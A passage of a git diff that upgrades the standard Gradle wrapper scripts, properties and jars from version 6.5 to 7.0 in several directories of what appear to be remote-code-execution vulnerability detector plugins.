distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/cve20121823/gradlew b/google/detectors/rce/cve20121823/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve20121823/gradlew +++ b/google/detectors/rce/cve20121823/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve20121823/gradlew.bat b/google/detectors/rce/cve20121823/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve20121823/gradlew.bat +++ b/google/detectors/rce/cve20121823/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/cve20171000353/gradlew b/google/detectors/rce/cve20171000353/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve20171000353/gradlew +++ b/google/detectors/rce/cve20171000353/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve20171000353/gradlew.bat b/google/detectors/rce/cve20171000353/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve20171000353/gradlew.bat +++ b/google/detectors/rce/cve20171000353/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- 